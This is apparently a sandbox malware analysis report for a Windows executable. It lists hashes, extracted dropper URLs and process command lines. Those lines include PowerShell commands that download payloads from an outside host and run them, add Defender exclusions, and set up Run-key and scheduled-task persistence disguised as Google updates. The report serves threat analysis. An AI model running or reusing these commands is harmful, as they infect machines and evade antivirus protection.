Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

d26c5ebd1d...3a.exe

windows7-x64

10

d26c5ebd1d...3a.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    64s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    14/09/2022, 07:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe

  • Size

    43KB

  • MD5

    d26c5ebd1d7fb1d5b8f8ef313d408b3a

  • SHA1

    1a2386f8d8e5f64eaf404e74c97ed94dc50627c7

  • SHA256

    c4ac79bf17fc00f26e2acdeeb0466da96ed9b928df1dd99b8c865a872bb2143d

  • SHA512

    dcdb0c5b3128379974ed1604d9196a486c7610867a29b6d985e9baf37485eb96397ce96ff8bd15490e93d6135afa5ca17136bfaa25892a17d4919fded8897fc9

  • SSDEEP

    768:Z84x3tuZYVP1stOVTBdlDR0YIWEj+JtrU0bLekwijxBY1SVvKnxKcS8bgGbaG6gk:Vx3VVVzd7Ej+7tbLek7jxG1SVSnccS8a

Score
10/10
persistence

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://cothdesigns2.com:443/obieznne.msi

Extracted

Language
ps1
Source
URLs
exe.dropper

http://cothdesigns2.com:443/H2022_Tool.msi

Extracted

Language
ps1
Source
URLs
exe.dropper

http://cothdesigns2.com:443/cmd.msi
exe.dropper

http://cothdesigns2.com:443/xmlo.msi

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Program crash 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe
    "C:\Users\Admin\AppData\Local\Temp\d26c5ebd1d7fb1d5b8f8ef313d408b3a.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1752 -s 1200
      2⤵
      • Program crash
      PID:1232
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd.exe /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:108
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1868
      • C:\Windows\system32\netsh.exe
        netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
        3⤵
          PID:520
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2024
        • C:\Windows\system32\netsh.exe
          netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
          3⤵
            PID:1892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Temp';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\GoogleUpdate.exe';Add-MpPreference -ExclusionProcess 'powershell.exe';Add-MpPreference -ExclusionProcess 'cmd.exe';Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
        1⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:856
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/obieznne.msi','C:\ProgramData\Google\software_reporter_tool.exe');C:\ProgramData\Google\software_reporter_tool.exe
        1⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe";cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe"
        1⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:968
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1304
          • C:\Windows\system32\reg.exe
            reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
            3⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:268
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:972
          • C:\Windows\system32\reg.exe
            reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
            3⤵
            • Adds policy Run key to start application
            • Modifies registry key
            PID:1568
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/H2022_Tool.msi','C:\Windows\Temp\H2022_Tool.exe');C:\Windows\Temp\H2022_Tool.exe
        1⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/cmd.msi','C:\ProgramData\Google\GoogleUpdate.exe');(New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/xmlo.msi','C:\Windows\Temp\.xml');cmd.exe /c schtasks /create /xml "C:\Windows\Temp\.xml" /tn "GoogleUpdateTask";cmd.exe /c del "C:\Windows\Temp\.xml"
        1⤵
          PID:2008

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          1fd0bfe7b147ca1730ba6b85f9f7a554

          SHA1

          576bf591e3864cc49e4cad0bfda87ff0efb01b93

          SHA256

          9662f51db6b42f0d115a0985014aa77ee83f660cc1c2c06d15801a06ad5b66bb

          SHA512

          bc2dfe64a22bfadd586ce0269c0c7cab7ac01a4922f6e49c8914fd05df6bf1a22d1005c464f7f7e0332f5cd1cf25b0ed1236b6f27ed71f0cbcb77542da9659c0

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          1fd0bfe7b147ca1730ba6b85f9f7a554

          SHA1

          576bf591e3864cc49e4cad0bfda87ff0efb01b93

          SHA256

          9662f51db6b42f0d115a0985014aa77ee83f660cc1c2c06d15801a06ad5b66bb

          SHA512

          bc2dfe64a22bfadd586ce0269c0c7cab7ac01a4922f6e49c8914fd05df6bf1a22d1005c464f7f7e0332f5cd1cf25b0ed1236b6f27ed71f0cbcb77542da9659c0

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          1fd0bfe7b147ca1730ba6b85f9f7a554

          SHA1

          576bf591e3864cc49e4cad0bfda87ff0efb01b93

          SHA256

          9662f51db6b42f0d115a0985014aa77ee83f660cc1c2c06d15801a06ad5b66bb

          SHA512

          bc2dfe64a22bfadd586ce0269c0c7cab7ac01a4922f6e49c8914fd05df6bf1a22d1005c464f7f7e0332f5cd1cf25b0ed1236b6f27ed71f0cbcb77542da9659c0

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          1fd0bfe7b147ca1730ba6b85f9f7a554

          SHA1

          576bf591e3864cc49e4cad0bfda87ff0efb01b93

          SHA256

          9662f51db6b42f0d115a0985014aa77ee83f660cc1c2c06d15801a06ad5b66bb

          SHA512

          bc2dfe64a22bfadd586ce0269c0c7cab7ac01a4922f6e49c8914fd05df6bf1a22d1005c464f7f7e0332f5cd1cf25b0ed1236b6f27ed71f0cbcb77542da9659c0

          Download Submit

        • memory/108-92-0x0000000002924000-0x0000000002927000-memory.dmp

          Filesize

          12KB

          Download

        • memory/108-55-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

          Filesize

          8KB

          Download

        • memory/108-72-0x0000000002924000-0x0000000002927000-memory.dmp

          Filesize

          12KB

          Download

        • memory/108-93-0x000000000292B000-0x000000000294A000-memory.dmp

          Filesize

          124KB

          Download

        • memory/108-106-0x000000000292B000-0x000000000294A000-memory.dmp

          Filesize

          124KB

          Download

        • memory/108-58-0x000007FEECF00000-0x000007FEED923000-memory.dmp

          Filesize

          10.1MB

          Download

        • memory/108-83-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

          Filesize

          3.0MB

          Download

        • memory/108-70-0x000007FEEB0C0000-0x000007FEEBC1D000-memory.dmp

          Filesize

          11.4MB

          Download

        • memory/108-105-0x0000000002924000-0x0000000002927000-memory.dmp

          Filesize

          12KB

          Download

        • memory/692-110-0x000000000294B000-0x000000000296A000-memory.dmp

          Filesize

          124KB

          Download

        • memory/692-81-0x000000001B700000-0x000000001B9FF000-memory.dmp

          Filesize

          3.0MB

          Download

        • memory/692-107-0x0000000002944000-0x0000000002947000-memory.dmp

          Filesize

          12KB

          Download

        • memory/692-74-0x0000000002944000-0x0000000002947000-memory.dmp

          Filesize

          12KB

          Download

        • memory/692-78-0x000007FEEB0C0000-0x000007FEEBC1D000-memory.dmp

          Filesize

          11.4MB

          Download

        • memory/692-112-0x000000000294B000-0x000000000296A000-memory.dmp

          Filesize

          124KB

          Download

        • memory/692-68-0x000007FEECF00000-0x000007FEED923000-memory.dmp

          Filesize

          10.1MB

          Download

        • memory/692-111-0x0000000002944000-0x0000000002947000-memory.dmp

          Filesize

          12KB

          Download

        • memory/692-97-0x000000000294B000-0x000000000296A000-memory.dmp

          Filesize

          124KB

          Download

        • memory/856-76-0x000007FEEB0C0000-0x000007FEEBC1D000-memory.dmp

          Filesize

          11.4MB

          Download

        • memory/856-87-0x00000000026BB000-0x00000000026DA000-memory.dmp

          Filesize

          124KB

          Download

        • memory/856-59-0x000007FEECF00000-0x000007FEED923000-memory.dmp

          Filesize

          10.1MB

          Download

        • memory/856-86-0x00000000026B4000-0x00000000026B7000-memory.dmp

          Filesize

          12KB

          Download

        • memory/856-71-0x00000000026B4000-0x00000000026B7000-memory.dmp

          Filesize

          12KB

          Download

        • memory/856-82-0x00000000026BB000-0x00000000026DA000-memory.dmp

          Filesize

          124KB

          Download

        • memory/968-67-0x000007FEECF00000-0x000007FEED923000-memory.dmp

          Filesize

          10.1MB

          Download

        • memory/968-100-0x0000000002904000-0x0000000002907000-memory.dmp

          Filesize

          12KB

          Download

        • memory/968-73-0x0000000002904000-0x0000000002907000-memory.dmp

          Filesize

          12KB

          Download

        • memory/968-85-0x000000001B7F0000-0x000000001BAEF000-memory.dmp

          Filesize

          3.0MB

          Download

        • memory/968-94-0x000000000290B000-0x000000000292A000-memory.dmp

          Filesize

          124KB

          Download

        • memory/968-75-0x000007FEEB0C0000-0x000007FEEBC1D000-memory.dmp

          Filesize

          11.4MB

          Download

        • memory/968-101-0x000000000290B000-0x000000000292A000-memory.dmp

          Filesize

          124KB

          Download

        • memory/1064-96-0x000000000249B000-0x00000000024BA000-memory.dmp

          Filesize

          124KB

          Download

        • memory/1064-109-0x000000000249B000-0x00000000024BA000-memory.dmp

          Filesize

          124KB

          Download

        • memory/1064-114-0x000000000249B000-0x00000000024BA000-memory.dmp

          Filesize

          124KB

          Download

        • memory/1064-113-0x0000000002494000-0x0000000002497000-memory.dmp

          Filesize

          12KB

          Download

        • memory/1064-69-0x000007FEECF00000-0x000007FEED923000-memory.dmp

          Filesize

          10.1MB

          Download

        • memory/1064-108-0x0000000002494000-0x0000000002497000-memory.dmp

          Filesize

          12KB

          Download

        • memory/1064-80-0x000000001B730000-0x000000001BA2F000-memory.dmp

          Filesize

          3.0MB

          Download

        • memory/1064-79-0x000007FEEB0C0000-0x000007FEEBC1D000-memory.dmp

          Filesize

          11.4MB

          Download

        • memory/1064-77-0x0000000002494000-0x0000000002497000-memory.dmp

          Filesize

          12KB

          Download

        • memory/1752-54-0x0000000001200000-0x0000000001210000-memory.dmp

          Filesize

          64KB

          Download